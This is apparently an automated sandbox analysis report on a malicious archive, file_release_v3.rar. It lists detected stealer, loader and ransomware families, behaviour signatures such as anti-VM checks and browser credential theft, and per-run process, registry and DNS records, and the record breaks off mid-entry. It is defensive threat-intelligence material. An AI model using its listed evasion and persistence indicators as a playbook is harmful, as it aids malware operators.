Analysis Overview
SHA256
b5894034c64a59c927615881f133b65857c750d43f2cb5064f1a0c42d25f4e6b
Threat Level: Known bad
The file file_release_v3.rar was found to be: Known bad.
Malicious Activity Summary
RisePro
ZGRat
Glupteba payload
Detect ZGRat V1
SmokeLoader
Stealc
Lumma Stealer
Glupteba
Djvu Ransomware
Detected Djvu ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Themida packer
Reads data files stored by FTP clients
Executes dropped EXE
Drops startup file
Modifies file permissions
Checks BIOS information in registry
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks for any installed AV software in registry
Drops Chrome extension
Looks up external IP address via web service
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Adds Run key to start application
Manipulates WinMonFS driver.
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Kills process with taskkill
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Checks processor information in registry
Modifies system certificate store
Checks SCSI registry key(s)
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-18 21:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231222-es
Max time kernel
142s
Max time network
153s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\BouncyCastle.Crypto.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231222-es
Max time kernel
144s
Max time network
153s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\opengl64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231222-es
Max time kernel
144s
Max time network
153s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 620 wrote to memory of 3624 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 620 wrote to memory of 3624 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 620 wrote to memory of 3624 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3624 -ip 3624
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231215-es
Max time kernel
119s
Max time network
130s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2996 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231222-es
Max time kernel
118s
Max time network
154s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2744 wrote to memory of 2636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2744 wrote to memory of 2636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2744 wrote to memory of 2636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win7-20231215-es
Max time kernel
131s
Max time network
152s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\SQLite.Interop.dll,#1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
137s
Max time network
164s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 412 wrote to memory of 3504 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 412 wrote to memory of 3504 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 412 wrote to memory of 3504 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
135s
Max time network
157s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win7-20231129-es
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1680 wrote to memory of 1736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
win10v2004-20231215-es
Max time kernel
142s
Max time network
153s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1184 wrote to memory of 5016 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1184 wrote to memory of 5016 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1184 wrote to memory of 5016 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\SQLite.Interop.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\SQLite.Interop.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win10v2004-20231215-es
Max time kernel
132s
Max time network
164s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x64\SQLite.Interop.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 22:00
Platform
win7-20231215-es
Max time kernel
122s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Resource\Locals\x86\BouncyCastle.Crypto.dll,#1
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-18 21:55
Reported
2024-02-18 21:59
Platform
